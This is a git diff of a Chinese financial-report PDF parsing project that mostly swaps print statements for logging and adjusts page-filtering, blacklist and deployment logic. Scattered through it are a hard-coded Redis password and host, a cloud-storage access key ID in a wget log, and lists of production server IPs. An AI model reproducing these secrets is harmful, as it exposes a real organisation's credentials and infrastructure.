                redis_client.incr(f'parsed_measure_count_{file_id}')
                if len(measure_list) > 0:
                    data_dict["measure_list"] = measure_list
                    data_dict["page_num"] = f"{str(t['page_num'])}_{str(t['table_index'])}"
@ -841,12 +863,12 @@ def get_table_measure(file_id, pdf_tables, record_range,partition_name,):
                    measure_obj.append(data_dict)
            db_service.insert_measure_data_to_milvus(client,partition_name,measure_obj,cursor_app,conn_app)
        except Exception as e:
-            print(f"循环获取表格数据这里报错了,数据是{t['data']},位置在{index}")
-            print(f"错误是:{e}")
+            logger.info(f"循环获取表格数据这里报错了,数据是{t['data']},位置在{index}")
+            logger.info(f"错误是:{e}")
        end = time.time()
-        print('提取指标 %s runs %0.2f seconds.' % (record_range, (end - start)))
+        logger.info('提取指标 %s runs %0.2f seconds.' % (record_range, (end - start)))
    except Exception as e:
-        print(f'这个错误是{e},所在的位置是{record_start}-{record_end}')
+        logger.info(f'这个错误是{e},所在的位置是{record_start}-{record_end}')
        record_start = record_range.split('-')[0]
        record_end = record_range.split('-')[1]
        for index in range(int(record_start),int(record_end)):
@ -857,7 +879,7 @@ def get_table_measure(file_id, pdf_tables, record_range,partition_name,):
            try:
                arr = np.array(t['data'])
            except Exception as e:
-                print(f'这个错误是{e}的arr的值是{arr}')
+                logger.info(f'这个错误是{e}的arr的值是{arr}')
    finally:
        redis_client.close()
        cursor.close()
@ -877,7 +899,7 @@ def dispatch_job(job_info):
        get_table_range(path, file_id, page_num, tables_range)
    except Exception as e:
-        print(e)
+        logger.info(e)
#指标归一化处理
@ -901,7 +923,7 @@ def update_measure_data(file_id,file_path,parent_table_pages,partition_name):
    # 创建一个cursor对象来执行SQL语句
    cursor_app = conn_app.cursor(buffered=True)
-    print(f'目录黑名单为:{parent_table_pages}')
+    logger.info(f'目录黑名单为:{parent_table_pages}')
    db_service.delete_to_run(conn,cursor,file_id)
    db_service.insert_table_measure_from_vector_async_process(cursor,parent_table_pages,file_id,file_path, partition_name)
@ -913,6 +935,44 @@ def update_measure_data(file_id,file_path,parent_table_pages,partition_name):
    cursor_app.close()
    conn_app.close()
+# def merge_consecutive_arrays(word_info):
+#     merged_objects = []
+#     temp_list = []
+#     for info_obj in word_info:
+#         try:
+#             if info_obj['type'] == 'table':
+#                 # 如果对象是表格,将其元素添加到临时列表中
+#                 data = info_obj['data']
+#                 if not data:
+#                     continue
+#                 first_row = data[0]
+#                 if all(re.search(r'[\u4e00-\u9fa5]', cell) for cell in first_row[1:]) and len(temp_list) == 0:
+#                     temp_list.append(info_obj)
+#                 elif all(re.search(r'[\u4e00-\u9fa5]', cell) for cell in first_row[1:]) and len(temp_list) > 0:
+#                     merged_objects.append(temp_list)
+#                     temp_list = []
+#                     temp_list.append(info_obj)
+#                 elif not all(re.search(r'[\u4e00-\u9fa5]', cell) for cell in first_row[1:]) and len(temp_list) > 0:
+#                     temp_data = temp_list[-1]['data']
+#                     temp_data = list(temp_data)
+#                     for row in list(info_obj['data']):
+#                         temp_data.append(row)
+#                     info_obj['data'] = temp_data
+#                     temp_list.clear()
+#                     temp_list.append(info_obj)
+#         except Exception as e:
+#             applog.error(f"解析数据错误: {e}")
+#     if temp_list:
+#         merged_objects.append(temp_list)
+#     return merged_objects
def merge_consecutive_arrays(pdf_info):
    merged_objects = []
    temp_array = {}
@ -941,7 +1001,7 @@ def merge_consecutive_arrays(pdf_info):
            temp_array = {} # 重置临时列表
    except Exception as e:
        #print(info_obj)
-        print(f"解析数据错误: {e}")
+        logger.info(f"解析数据错误: {e}")
    if temp_array:
        merged_objects.append(temp_array)
@ -980,7 +1040,7 @@ def merge_consecutive_arrays_v1(pdf_info):
        merged_objects.append(temp_array)
        temp_array = {} # 重置临时列表
    except Exception as e:
-        print(f"解析数据错误: {e}")
+        logger.info(f"解析数据错误: {e}")
    # 循环结束后,检查临时列表是否非空,如果非空,则添加到结果中
    if temp_array:
@ -1017,7 +1077,7 @@ def start_table_measure_job(file_id,partition_name):
    redis_client.close()
    records_range_parts = utils.get_range(len(pdf_tables),MEASURE_COUNT)
-    print(f'records_range_part识别页码的值为{records_range_parts}')
+    logger.info(f'records_range_part识别页码的值为{records_range_parts}')
    processes = []
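The commented-out word-document variant above decides whether a table fragment opens a new table by testing whether every cell after the first in its first row contains Chinese text. Isolated, the heuristic looks like this (sketch; sample rows invented):

import re

def looks_like_header(first_row):
    # 非首列单元格全部含中文时视为表头行(新表开始),否则视为数值续表
    return all(re.search(r'[\u4e00-\u9fa5]', cell) for cell in first_row[1:])

print(looks_like_header(['项目', '本期金额', '上期金额']))                 # True
print(looks_like_header(['营业收入', '1003535799.51', '958013306.64']))  # False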

110753
zzb_data_prod/nohup.out Normal file

File diff suppressed because one or more lines are too long

View File

@ -157,7 +157,7 @@ def create_text_outline(pdf_path, file_id):
            if len(re.findall('财务报表主要项目注释', title)) == 0:
                page_end = page_end - 1
            # print(title,page_start,page_end)
-            for i in range(page_start, page_end + 1):
+            for i in range(page_start, page_end):
                # 将每个数字添加到列表中
                parent_table_pages_local[file_id].append(i)
        file_info['page_count'] = page_count
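Dropping the "+ 1" narrows the blacklist by one page: Python's range excludes its upper bound, so the last page of each filtered section is now kept. With page_start=3 and page_end=5, for example:

print(list(range(3, 6)))  # [3, 4, 5]  old behaviour, page_end included
print(list(range(3, 5)))  # [3, 4]     new behaviour, page_end excluded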
@ -168,6 +168,68 @@
        return file_info
def create_text_outline_disclosure(pdf_path, file_id):
    # print('Running the script for [%s] with padding [%d]' % (pdf_path, page_number_padding))
    # creating an object
    with open(pdf_path, 'rb') as file:
        file_info = {}
        fileReader = PyPDF2.PdfReader(file)
        page_count = len(fileReader.pages)
        redis_client = redis.Redis(host=REDIS_HOST, port=REDIS_PORT, password=REDIS_PASSWORD, db=6)
        redis_client.set(f'page_count_{file_id}', page_count)
        info = {
            'page_count': page_count,
            'all_pages': {},
            'current_page_id': 1,
            'padding': 0
        }
        print('Number of pages: %d' % info['page_count'])
        pages = fileReader.trailer['/Root']['/Pages'].get_object()
        recursive_numbering(pages, info)
        #for page_num, page in enumerate(pages['/Kids']):
        #    page_obj = page.getObject()
        #    all_pages[id(page_obj)] = page_num + 1 # who starts counting from 0 anyways?
        title_array = get_tree_pages(fileReader.outline, info, 0, [])
        #db_service.pdf_title_insert_mysql(file_id,title_array)
        #title_array = db_service.get_file_info_from_mysql(file_id)
        parent_table_pages_local = {}
        parent_table_pages_local[file_id] = []
        print(f'{file_id}:{len(title_array)}')
        for i in range(len(title_array)):
            title_obj = title_array[i]
            title = title_obj['title']
            #print(f'标题分别是{title}')
            if len(re.findall('母公司|现金流量表补充|重要会计政策|会计估计变更|公允价值的披露|合营安排或联营企业中的权益|与金融工具相关的风险|税项|主要控股参股公司|结构化主体情况|公司股份总数及股东结构变动及公司资产和负债结构的变动情况|所有权或使用权受到限制的资产|在建工程|固定资产|其他主体中的权益|分部信息|与金融工具相关的风险|其他关联交易|公司子公司重大事项', title)) > 0:
                page_start = title_obj['page_num']
                depth = title_obj['depth']
                if i < len(title_array) - 1:
                    page_end = title_array[i+1]['page_num']
                    if title_array[i]['depth'] in [1, 2]:
                        page_end = get_page_end(i+1, depth, title_array)
                else:
                    page_end = page_count
                print(f'目录识别时被丢弃的页码:{page_start}-{page_end}')
                # 当标题为母公司财务报表主要项目注释时,最后一页不过滤,避免核心roe指标无法召回
                if len(re.findall('财务报表主要项目注释', title)) == 0:
                    page_end = page_end - 1
                # print(title,page_start,page_end)
                for page_no in range(page_start, page_end + 1):
                    # 将每个数字添加到列表中
                    parent_table_pages_local[file_id].append(page_no)
        file_info['page_count'] = page_count
        file_info['parent_table_pages'] = parent_table_pages_local[file_id]
        file_info['split_parts'] = get_file_split(page_count)
        redis_client.close()
        return file_info
if __name__ == '__main__':
    import time
    path = "/Users/zhengfei/Desktop/cb/2023年报检测/安妮股份.pdf"

View File

@ -2,18 +2,18 @@
# 设置文件路径和目标目录# 请注意这列的config文件是不可以进行传输的 /root/pdf_parser/zzb_data_prod/utils.py /root/pdf_parser/zzb_data_prod/db_service.py
#FILES="/root/pdf_parser/zzb_data_prod/utils.py /root/pdf_parser/zzb_data_prod/db_service.py /root/pdf_parser/zzb_data_prod/app.py /root/pdf_parser/zzb_data_prod/main.py /root/pdf_parser/zzb_data_prod/pdf_title.py"
-FILES="/root/pdf_parser/zzb_data_prod/main.py"
+FILES="/root/pdf_parser/zzb_data_prod/put_code.sh"
DEST_PATH="/root/pdf_parser/zzb_data_prod"
# 设置服务器列表 主服务器 "1.94.143.23" "113.44.72.157" "1.94.101.237" "123.60.16.225" "124.71.157.162" "1.94.60.103" "1.94.143.23" "124.71.149.225" "113.44.52.221" "121.37.137.13"
#SERVERS=("113.44.72.157" "1.94.101.237" "123.60.16.225" "124.71.157.162" "1.94.60.103" "124.71.149.225" "113.44.52.221" "121.37.137.13" "123.60.28.83" "192.168.0.19" "192.168.0.53" "192.168.0.150" "192.168.0.210" "192.168.0.129" "192.168.0.24" "192.168.0.250" "192.168.0.162" "192.168.0.86" "192.168.0.88" "192.168.0.93" "192.168.0.228" "192.168.0.155" "192.168.0.186" "192.168.0.56" "192.168.0.185" "192.168.0.72" "192.168.0.35" "192.168.0.230" "192.168.0.125" "192.168.0.46" "192.168.0.131")
#SERVERS=("192.168.0.228" "192.168.0.155" "192.168.0.186" "192.168.0.56" "192.168.0.185")
#监管服务器
-SERVERS=("192.168.0.108" "192.168.0.131")
+#SERVERS=("192.168.0.108" "192.168.0.131")
#企业服务器
#SERVERS=("192.168.0.163" "192.168.0.26" "192.168.0.2" "192.168.0.128" "192.168.0.136" "192.168.0.239")
#两者一起
-#SERVERS=("192.168.0.163" "192.168.0.26" "192.168.0.2" "192.168.0.128" "192.168.0.136" "192.168.0.239" "192.168.0.108" "192.168.0.131")
+SERVERS=("192.168.0.163" "192.168.0.26" "192.168.0.2" "192.168.0.128" "192.168.0.136" "192.168.0.239" "192.168.0.108" "192.168.0.131")
# 遍历每个服务器并上传文件
for SERVER in "${SERVERS[@]}"; do
    echo "Uploading files to $SERVER"

View File

@ -11,3 +11,5 @@ uvicorn
redis
ghostscript
opencv-python-headless
+python-docx
+docx2pdf

View File

@ -9,6 +9,8 @@ import re,os,time
import requests
import config
import numpy as np
+import logging
+log = logging.getLogger(__name__)
def get_md5(str):
    import hashlib
@ -29,13 +31,13 @@ def embed_with_str(input):
        if resp.status_code == HTTPStatus.OK:
            return resp
        elif resp.status_code == 429:
-            print(f'触发限流,等待{t}秒后重试')
+            log.info('触发限流,等待%s秒后重试', t)
            retry += 1
            t+=0.1
        else:
-            print(f'请求失败,状态码:{resp.status_code}')
+            log.info('请求失败,状态码:%s', resp.status_code)
            return None
-    print('重试超过上限')
+    log.info('重试超过上限')
    return None
#如果存在‘归属于|扣非’,就保留括号内的内容,并去掉标点符号和中文数字。
@ -111,10 +113,10 @@ def save_pdf_from_url(url, file_path):
        with open(local_file_path, 'wb') as file:
            file.write(response.content)
-        print(f"文件已下载到 {local_file_path}")
+        log.info("文件已下载到 %s", local_file_path)
    else:
        # 文件下载失败
-        print(f"无法下载文件,状态码:{response.status_code}")
+        log.info("无法下载文件,状态码:%s", response.status_code)
    return local_file_path
@ -225,7 +227,15 @@ def get_percent_growth(text):
def check_black_list(meta_measure,pdf_measure):
    # 判断指标名是否包含黑名单词
-    #black_array = ['非经常性损益:非经常性损益合计,非经常性损益总额','营业收入:营业外收入,主营业务,营业总收入,扣除,年度公司','归母净利润:净资产,净利率,扣除,年度公司','扣非净利润:净资产,净利率,年度公司','经营活动现金流净额:筹资活动,投资活动,流入小计,流出小计','筹资活动现金流净额:经营活动,投资活动,流入小计,流出小计','投资活动现金流净额:经营活动,筹资活动,流入小计,流出小计','非经常性损益:扣除非经常性损益','基本每股收益:稀释每股收益','稀释每股收益:基本每股收益','总资产:净资产','应收账款:应付账款','短期借款:长期借款','应付账款:应收账款','长期借款:短期借款','研发投入:比例,比率,占比,费用','资本化研发投入:比例,比率,占比,费用','资本化研发投入占比:金额,费用','研发投入占营业收入比例:金额,费用','上年年末:1月1日']
+    #black_array = ['非经常性损益:非经常性损益合计,非经常性损益总额','营业收入:营业外收入,主营业务,营业总收入,扣除,年度公司','归母净利润:净资产,净利率,扣除,年度公司','扣非净利润:净资产,净利率,年度公司','经营活动现金流净额:筹资活动,投资活动,流入小计,流出小计','筹资活动现金流净额:经营活动,投资活动,流入小计,流出小计','投资活动现金流净额:经营活动,筹资活动,流入小计,流出小计','非经常性损益:扣除非经常性损益','基本每股收益:稀释每股收益','稀释每股收益:基本每股收益','总资产:净资产','应收账款:应付账款','短期借款:长期借款','应付账款:应收账款','长期借款:短期借款','研发投入:比例,比率,占比,费用','资本化研发投入:比例,比率,占比,费用','资本化研发投入占比:金额,费用','研发投入占营业收入比例:金额,费用']
+    # for black in black_array:
+    #     black_meta = black.split(':')[0]
+    #     black_pdfs = black.split(':')[1].split(',')
+    #     if meta_measure.find(black_meta) >= 0:
+    #         for pdf in black_pdfs:
+    #             if pdf_measure.find(pdf) >= 0:
+    #                 return True
+    #     return False
    black_array = ['非经常性损益:非经常性损益合计,非经常性损益总额,合计','营业收入:营业外收入,主营业务,营业总收入,扣除,年底公司,合计,汇总'
        ,'归母净利润:净资产,净利率,扣除,年度公司','扣非净利润:净资产,净利率,年度公司'
        ,'经营活动现金流净额:筹资活动,投资活动,流入小计,流出小计,每股,扣除','筹资活动现金流净额:经营活动,投资活动,流入小计,流出小计,每股,扣除'
@ -344,17 +354,17 @@ def get_change_rate_flag(text):
if __name__ == '__main__':
-    print(under_non_alpha_ratio('②2022年度'))
+    log.info(under_non_alpha_ratio('②2022年度'))
    # title = '母公司财务报表主要项目注释'
    # if len(re.findall('母公司|现金流量表补充', title)) >0 and len(re.findall('项目注释', title)) == 0:
-    #     print('1')
+    #     log.info('1')
    # else:
-    #     print('0')
+    #     log.info('0')
-    # print(check_black_list('当期投资活动现金流净额','当前筹资活动现金流净额'))
+    # log.info(check_black_list('当期投资活动现金流净额','当前筹资活动现金流净额'))
    # test = '2023年1-12月'
-    # print(get_period_type('上年度本期费用化研发投入'))
-    # print(get_period_type('费用化研发投入本年度'))
+    # log.info(get_period_type('上年度本期费用化研发投入'))
+    # log.info(get_period_type('费用化研发投入本年度'))
    # vector_a = embed_with_str('第一季度营业收入')
    # vector = vector_a.output["embeddings"][0]["embedding"]
@ -362,7 +372,7 @@ if __name__ == '__main__':
    # vector1 = vector_b.output["embeddings"][0]["embedding"]
    # similarity = cosine_similarity(vector, vector1)
-    # print(f"余弦相似度: {similarity}")
+    # log.info("余弦相似度: %s", similarity)
    # measure_data = [
    #     '1,1,营业收入2023年金额,1003535799.51',
@ -577,21 +587,14 @@ if __name__ == '__main__':
    # )
    # vector_obj = embed_with_str('2023年营业收入')
    # vector = vector_obj.output["embeddings"][0]["embedding"]
-    # data = [vector]
-    # res = client.search(
-    #     collection_name="zzb_measure", # Replace with the actual name of your collection
-    #     # Replace with your query vector
-    #     data=data,
-    #     limit=1, # Max. number of search results to return
-    #     search_params={"metric_type": "COSINE", "params": {}}, # Search parameters
-    #     output_fields=["measure_name","measure_value"]
-    # )
-    # # Convert the output to a formatted JSON string
-    # result = json.dumps(res, indent=4, ensure_ascii=False)
-    # print(result)
+    # vector_b = embed_with_str('营业收入第一季度')
+    # vector1 = vector_b.output["embeddings"][0]["embedding"]
+    # similarity = cosine_similarity(vector, vector1)
+    # log.info("余弦相似度: %s", similarity)
    # insert_measure_data(client, measure_data)
    # text = '营业收入第一季度(1-3月份)'
    # new_text = re.sub(r'([^)]*)', '',text)
-    # print(new_text)
+    # log.info(new_text)

3
zzb_data_prod/test.pdf Normal file
View File

@ -0,0 +1,3 @@
--2024-12-27 11:23:36-- https://financial-report.obs.cn-east-3.myhuaweicloud.com/upload/file/44b374ac0fe140a2922c360db47335a1.PDF?AccessKeyId=WMBIZTLULUR24OBUIRC4
Resolving financial-report.obs.cn-east-3.myhuaweicloud.com (financial-report.obs.cn-east-3.myhuaweicloud.com)... failed: Name or service not known.
wget: unable to resolve host address financial-report.obs.cn-east-3.myhuaweicloud.com

View File

@ -1,154 +1,14 @@
-#coding=utf-8
+# -*- coding: utf-8 -*-
-import sys,ast
+import re
from pdfminer.high_level import extract_text
from pdfminer.pdfparser import PDFParser
from pdfminer.pdfdocument import PDFDocument
from pdfminer.pdfpage import PDFPage
import utils
import mysql.connector
from pymilvus import connections,MilvusClient
import json
import db_service
import ast
import numpy as np
import config
import redis_service
from config import MILVUS_CLIENT,MYSQL_HOST,MYSQL_USER,MYSQL_PASSWORD,MYSQL_DB
import main
import redis
def measure_config_to_db(conn,cursor):
insert_query = '''
INSERT INTO measure_config
(measure_id, measure_name, ori_measure_id, ori_measure_name)
VALUES (%s, %s, %s, %s)
'''
check_query = '''
select ori_measure_id from measure_config
'''
# 打开文本文件
with open('/Users/zhengfei/work/zzb_data/measure_config_all.txt', 'r') as file:
# 读取所有行到一个列表中
lines = file.readlines()
# 打印每一行
for line in lines:
config_list = line.strip().split(',')
measure = config_list[0]
ori_measure = config_list[1]
ori_measure_id = utils.get_md5(ori_measure)
# 判断数据库中是否有数据
# cursor.execute(check_query.format(ori_measure_id=ori_measure_id))
# check_records = cursor.fetchall()
# if(len(check_records)) > 0:
# continue
data_to_insert = (utils.get_md5(measure), measure, ori_measure_id, ori_measure)
cursor.execute(insert_query, data_to_insert)
conn.commit()
def insert_measure_vector(conn,cursor):
redis_client = redis.Redis(host='192.168.0.172', port=6379, password='Xgf_redis', db=6)
# 执行SQL语句更新数据
select_query = '''
SELECT ori_measure_id,ori_measure_name FROM measure_config
'''
cursor.execute(select_query)
records = cursor.fetchall()
for record in records:
if redis_client.hexists('measure_config', record[0]):
measure_vector = redis_client.hget('measure_config', record[0])
else:
print('新增指标',record[1])
vector_obj = utils.embed_with_str(record[1])
measure_vector = str(vector_obj.output["embeddings"][0]["embedding"])
redis_client.hset('measure_config', record[0], measure_vector)
redis_client.close()
conn.close()
def contains_financial_indicators(text):
import re
# 正则表达式模式匹配千分位格式的数字和百分比
pattern = r"\d{1,3}(,\d{3})+(\.\d{1,3})?"
pattern1 = r"\d+(.\d+)+%?"
# 使用 re.search 函数查找匹配项
match = re.search(pattern1, text)
# 如果找到匹配项,返回 True否则返回 False
return bool(match)
def get_clean_text(text):
import re
pattern = r"([^)]*?)"
matches = re.findall(pattern, text)
for match in matches:
# 使用 re.findall 函数查找括号内的内容中是否包含月份或关键词
month_keywords_found = re.search(r"归属于|扣非", match)
if not month_keywords_found:
# 如果包含,则从文本中删除该部分
text = re.sub(pattern,"", text)
else:
# 如果不包含,删除所有标点符号和中文数字
text = re.sub(r"[^\w\s]", "", text)
print(text)
def insert_and_update(conn,cursor,client,parent_table_pages,file_id,path):
# #通过向量查询指标
db_service.insert_table_measure_from_vector(conn,cursor,client,parent_table_pages,file_id,path)
# #指标归一化处理
db_service.update_ori_measure(conn,cursor,file_id)
def print_measure_data(cursor,client):
select_query = '''
SELECT ori_measure_name,measure_name,ori_measure_id FROM measure_config
where measure_id not in(select distinct measure_id from ori_measure_list where file_id='64')
'''
cursor.execute(select_query)
records = cursor.fetchall()
for record in records:
ori_measure_name = record[0]
measure_name = record[1]
ori_measure_id = record[2]
measure_vector = redis_service.read_from_redis(ori_measure_id)
measure_list = ast.literal_eval(measure_vector)
data = [measure_list]
res = client.search(
collection_name="pdf_measure_v4", # Replace with the actual name of your collection
# Replace with your query vector
data=data,
limit=2, # Max. number of search results to return
search_params={"metric_type": "COSINE", "params": {}}, # Search parameters
output_fields=["measure_name","measure_value","table_num","table_index"],
filter = 'file_id == "64"'
)
vector_str = measure_name+":"+ori_measure_name
# Convert the output to a formatted JSON string
for i in range(len(res[0])):
vector_distance = float(res[0][i]["distance"])
vector_measure_name = res[0][i]["entity"]["measure_name"]
measure_value = res[0][i]["entity"]["measure_value"]
table_num = res[0][i]["entity"]["table_num"]
table_index = res[0][i]["entity"]["table_index"]
table_num_list = [106]
print(vector_str +":"+vector_measure_name+":"+str(vector_distance) +":"+measure_value +":"+str(table_num) +":"+str(table_index))
# if vector_distance > 0.89 and table_num not in table_num_list:
# print(vector_str +":"+vector_measure_name+":"+str(vector_distance) +":"+measure_value +":"+str(table_num) +":"+str(table_index)+":"+str(0.94))
# if vector_distance > distance and table_num not in table_num_list:
# print(vector_str +":"+vector_measure_name +":"+measure_value +":"+str(table_num) +":"+str(table_index)+":"+str(vector_distance)+":"+str(distance))
list1 = [['2将重分类进损益的其他综合收益', '', '-135441.46', '58032.20'], ['1权益法下可转损益的其他综合收益', '', '', ''], ['2其他债权投资公允价值变动', '', '', ''], ['3金融资产重分类计入其他综合收益的金额', '', '', ''], ['4其他债权投资信用减值准备', '', '', ''], ['5现金流量套期储备', '', '', ''], ['6外币财务报表折算差额', '', '-135441.46', '58032.20'], ['7其他', '', '', ''], ['(二)归属于少数股东的其他综合收益的税后净额', '', '', ''], ['七、综合收益总额', '', '-154059285.14', '15109700.10'], ['(一)归属于母公司所有者的综合收益总额', '', '-153881248.66', '15109700.10'], ['(二)归属于少数股东的综合收益总额', '', '-178036.48', ''], ['八、每股收益:', '八、每股收益:', '八、每股收益:', '八、每股收益:'], ['(一)基本每股收益(元/股) -0.6693 0.0715', '(一)基本每股收益(元/股) -0.6693 0.0715', '(一)基本每股收益(元/股) -0.6693 0.0715', '(一)基本每股收益(元/股) -0.6693 0.0715'], ['(二)稀释每股收益(元/股) -0.6693 0.0714', '(二)稀释每股收益(元/股) -0.6693 0.0714', '(二)稀释每股收益(元/股) -0.6693 0.0714', '(二)稀释每股收益(元/股) -0.6693 0.0714']]
# 测试代码
if __name__ == "__main__":
conn = mysql.connector.connect(
host=MYSQL_HOST,
user=MYSQL_USER,
password=MYSQL_PASSWORD,
database=MYSQL_DB
)
cursor = conn.cursor()
-    insert_measure_vector(conn,cursor)
+    for lines in list1:
+        line = list(set(lines))
+        print(line)

View File

@ -7,6 +7,8 @@ from pdfminer.layout import LTTextContainer, LTChar, LTRect, LTFigure
import pdfplumber
import os
+import logging
+log = logging.getLogger(__name__)
# 创建一个文本提取函数
@ -125,8 +127,8 @@
            upper_side = element.y1
            # 从表中提取信息
            table = extract_table(pdf_path, pagenum, table_num)
-            # print('第'+str(pagenum)+'页第'+str(table_num)+'个表格')
-            # print(table)
+            # log.info('第%s页第%s个表格', str(pagenum), str(table_num))
+            # log.info(table)
            # 将表信息转换为结构化字符串格式
            table_string = table_converter(table)
            # 将表字符串追加到列表中
@ -148,15 +150,15 @@
            first_element = True
            table_num+=1
-    print('第'+str(pagenum)+'部分')
-    print('page_text:')
-    print(page_text)
+    log.info('第%s部分', str(pagenum))
+    log.info('page_text:')
+    log.info(page_text)
-    #print('line_format:')
-    #print(line_format)
-    #print('text_from_tables:')
-    #print(text_from_tables)
-    #print('page_content:')
-    #print(page_content)
+    #log.info('line_format:')
+    #log.info(line_format)
+    #log.info('text_from_tables:')
+    #log.info(text_from_tables)
+    #log.info('page_content:')
+    #log.info(page_content)
    # 创建字典的键
    dctkey = 'Page_'+str(pagenum)
@ -171,7 +173,7 @@ pdfFileObj.close()
# 显示页面内容
-# result = ''.join(text_per_page['Page_0'][4])
-# print(result)
+# result = ''.join(text_per_page['Page_0'][4])
+# log.info(result)
# result1 = ''.join(text_per_page['Page_1'][4])
-# print(result1)
+# log.info(result1)
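Both extraction scripts follow the standard pdfminer.six layout loop; stripped to its core it looks like this (minimal sketch, the file path is a placeholder):

from pdfminer.high_level import extract_pages
from pdfminer.layout import LTTextContainer

for pagenum, page_layout in enumerate(extract_pages('report.pdf')):
    for element in page_layout:
        if isinstance(element, LTTextContainer):
            print(pagenum, element.get_text().strip())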

View File

@ -4,6 +4,8 @@ import PyPDF2
from pdfminer.high_level import extract_pages
from pdfminer.layout import LTTextContainer, LTRect
import pdfplumber
+import logging
+log = logging.getLogger(__name__)
import os
@ -82,7 +85,7 @@
        text_obj['page_num'] = pagenum
        text_obj['text'] = page_text
-        print("pagenum:",pagenum," text:",page_text)
+        log.info("pagenum: %s text: %s", pagenum, page_text)
# 打印提取的文本
-# print(page_obj)
+# log.info(page_obj)

View File

@ -1,5 +1,7 @@
import os
import re
+import logging
+log = logging.getLogger(__name__)
from tqdm import tqdm
from pdfminer.pdfparser import PDFParser,PDFDocument
from pdfminer.pdfinterp import PDFResourceManager, PDFPageInterpreter
@ -24,7 +26,7 @@ def pdf_parse(pdf_path,txt_path):
    #检测文档是否提供txt转换,不提供就忽略
    if not doc.is_extractable:
-        print(pdf_path)
+        log.info(pdf_path)
        raise PDFTextExtractionNotAllowed
    else:
        #创建PDF资源管理器来共享资源
@ -48,7 +50,7 @@ def pdf_parse(pdf_path,txt_path):
            if(isinstance(x,LTTextBoxHorizontal)):
                with open(txt_path,'a') as f:
                    results = x.get_text()
-                    # print(results)
+                    # log.info(results)
                    f.write(results +"\n")
@ -68,5 +70,5 @@
        txt_path = save_txt_path+txt_name
        pdf_parse(pdf_path, txt_path)
    except:
-        print("转换失败:", pdf_name)
+        log.info("转换失败:%s", pdf_name)
        continue
continue continue

View File

@ -4,6 +4,8 @@ import os
import json
import numpy as np
from datetime import datetime
+import logging
+logger = logging.getLogger(__name__)
# 读取PDF
import PyPDF2
# 分析PDF的layout,提取文本
@ -230,7 +232,7 @@ def get_measure_from_llm(user_prompt):
        llm_measure_list = result.split('\n')
        return llm_measure_list
    else:
-        print('Request id: %s, Status code: %s, error code: %s, error message: %s' % (
+        logger.error('Request id: %s, Status code: %s, error code: %s, error message: %s' % (
            response.request_id, response.status_code,
            response.code, response.message
        ))
@ -270,7 +272,7 @@ def parse_llm_measure_to_db(measure_info,type,conn,cursor):
        ori_measure_id = get_md5(ori_measure_name)
        data_to_insert = (file_id, file_name, type, int(page_num), int(table_index), ori_measure_id, ori_measure_name, ori_measure_value, create_time, create_time)
        cursor.execute(insert_query, data_to_insert)
-        print(f"{type},{page_num},{table_index},{ori_measure_name},{ori_measure_value}")
+        logger.info(f"{type},{page_num},{table_index},{ori_measure_name},{ori_measure_value}")
    # 提交事务
    conn.commit()
@ -300,7 +302,7 @@ def update_ori_measure(conn,cursor):
if __name__ == "__main__":
    start_time = datetime.now()
-    print("开始时间:", start_time.strftime("%Y-%m-%d %H:%M:%S"))
+    logger.info("开始时间:", start_time.strftime("%Y-%m-%d %H:%M:%S"))
    path = "/Users/zhengfei/Desktop/科润智控1.pdf"
    table_info = get_table_measure(path)
@ -324,10 +326,10 @@
        table_index = table_obj['page_num'].split("_")[1]
        table_measure = ','.join(table_obj['measure_list'])
        if table_page_num == '3':
-            print(f"第{table_page_num}页表格指标为:{table_measure}")
+            logger.info(f"第{table_page_num}页表格指标为:{table_measure}")
        table_llm_measure = get_measure_from_llm(table_measure)
        if table_page_num == '3':
-            print(f"第{table_page_num}页表格llm指标为:{table_llm_measure}")
+            logger.info(f"第{table_page_num}页表格llm指标为:{table_llm_measure}")
        # table_measure_obj['page_num'] = table_page_num
        # table_measure_obj['table_index'] = table_index
        # table_measure_obj['llm_measure'] = table_llm_measure
@ -352,5 +354,5 @@
    # parse_llm_measure_to_db(measure_info)
    # get_measure_from_llm()
    end_time = datetime.now()
-    print("结束时间:", end_time.strftime("%Y-%m-%d %H:%M:%S"))
+    logger.info("结束时间:", end_time.strftime("%Y-%m-%d %H:%M:%S"))
#print(pdf_data)

View File

@ -19,6 +19,8 @@ from pymilvus import MilvusClient
#import pdf_title
import numpy as np
#from multiprocessing import Process
+import logging
+logger = logging.getLogger(__name__)
@ -81,9 +83,9 @@ def get_text_content_test(file_path,file_id,pages,tables_range):
            # 记录需要过滤掉的页码
            if len(re.findall('母公司|现金流量表补充', line_text)) > 0:
-                print('成功识别到了')
+                logger.info('成功识别到了')
    except Exception as e:
-        print(f"Error processing page {pagenum+1}: {e}")
+        logger.error(f"Error processing page {pagenum+1}: {e}")
pdf_path = r"combined_v61.pdf"
file_id = 1

View File

@ -19,6 +19,8 @@ from pymilvus import MilvusClient
#import pdf_title
import numpy as np
#from multiprocessing import Process
+import logging
+logger = logging.getLogger(__name__)
STR_PATTERN = '营业收入|净利润|变动比例|损益|现金流量净额|现金净流量|现金流|每股收益|总资产|资产总额|收益率|货币资金|应收账款|存货|固定资产|在建工程|商誉|短期借款|应付账款|合同负债|长期借款|营业成本|销售费用|管理费用|财务费用|研发费用|研发投入'
#负责表内一旦出现某个字符,整个表丢弃
@ -202,7 +204,7 @@ tables_range = {}
# print('Task %s runs %0.2f seconds.' % (f'解析表格{pages}', (end - start)))
def get_table_range_test(file_path, file_id, pages, tables_range):
-    print('Run task %s (%s)...' % (f'解析表格{pages}', os.getpid()))
+    logger.info('Run task %s (%s)...' % (f'解析表格{pages}', os.getpid()))
    start = time.time()
    # conn = mysql.connector.connect(
@ -295,7 +297,7 @@ def get_table_range_test(file_path, file_id, pages, tables_range):
                'table_index' : table_index,
                'page_num' : page_num,
            })
-            print(f"tables_range的值是{tables_range}")
+            logger.debug(f"tables_range的值是{tables_range}")
    # db_service.insert_pdf_parse_process({
    #     'file_id': file_id,
@ -319,7 +321,7 @@ def get_table_range_test(file_path, file_id, pages, tables_range):
    # redis_client.close()
    end = time.time()
-    print('Task %s runs %0.2f seconds.' % (f'解析表格{pages}', (end - start)))
+    logger.info('Task %s runs %0.2f seconds.' % (f'解析表格{pages}', (end - start)))
get_table_range_test(file_path, file_id, pages, tables_range)

View File

@ -10,6 +10,12 @@ import requests
import config
import numpy as np
from docx2pdf import convert
+from config import api_key
+import logging
+logger = logging.getLogger(__name__)
+dashscope.api_key = api_key
def get_md5(str):
    import hashlib
@ -20,25 +26,27 @@ def get_md5(str):
def embed_with_str(input):
    retry = 0
    max_retry = 5
-    t = 0.1
+    t = 0.2
    while retry < max_retry:
